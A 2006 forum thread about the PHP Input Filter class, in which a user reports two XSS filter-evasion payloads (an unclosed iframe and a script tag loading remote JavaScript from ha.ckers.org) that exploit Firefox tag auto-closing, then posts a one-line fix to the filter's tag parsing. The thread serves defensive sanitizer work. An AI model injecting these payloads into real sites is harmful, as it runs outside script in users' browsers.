PHP Classes

XSS Problem

Recommend this page to a friend!

      PHP Input Filter  >  All threads  >  XSS Problem  >  (Un) Subscribe thread alerts  
Subject:XSS Problem
Summary:This Problem only affects FF1.5 and up users
Messages:2
Author:Matthew Campos
Date:2006-06-27 20:00:32
Update:2006-06-28 17:18:55
 

  1. XSS Problem   Reply   Report abuse  
Picture of Matthew Campos Matthew Campos - 2006-06-27 20:00:32
Because FireFox is so helpful and will close tags left open, it breaks alot of filters and these little gems of code below can/will cause a XSS attack that is not caught or I have not figured out how to catch it with this class.

Ideas?

<iframe src=http://ha.ckers.org/scriptlet.html <


<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

  2. Re: XSS Problem   Reply   Report abuse  
Picture of Matthew Campos Matthew Campos - 2006-06-28 17:18:55 - In reply to message 1 from Matthew Campos
Found a fix for this.

Changed line 55 of class.inputfilter_clean.php to:

if ($tagOpen_end === false) {$tagOpen_end = strpos($fromTagOpen, ' ');}